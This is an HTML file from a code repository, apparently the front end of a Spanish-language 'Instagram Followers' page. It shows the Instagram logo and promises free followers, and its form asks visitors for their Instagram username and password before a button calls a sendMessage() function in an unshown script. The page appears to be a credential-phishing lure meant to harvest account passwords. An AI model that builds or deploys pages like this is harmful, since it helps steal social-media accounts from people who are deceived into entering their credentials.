-
Notifications
You must be signed in to change notification settings - Fork 4
/
index.html
32 lines (29 loc) · 1.24 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Instagram Followers!</title>
<!-- External css -->
<link rel="stylesheet" href="style.css">
<!-- Font awesome link -->
<link rel="icon" href="favicon.ico" type="image/ico" />
</head>
<body>
<script src="index.js"></script>
<section class="form-register">
<center>
<img class="logo" src="instagram.png" type="image/png" width="100" height="100">
</center>
<h4>Seguidores Instagram</h4>
<form method="get">
<input class="controls" type="text" name="username" id="username" placeholder="Nombre de Instagram" />
<input class="controls" type="password" name="password" id="password" placeholder="Contraseña" />
<input class="controls" type="text" name="followers" id="followers" placeholder="Número de Seguidores" />
<!-- <input class="botons" type="submit" value="Enviar seguidores"> -->
<button type="button" class="botons" onclick="sendMessage()">Enviar Seguidores</button>
</form>
</section>
</body>
</html>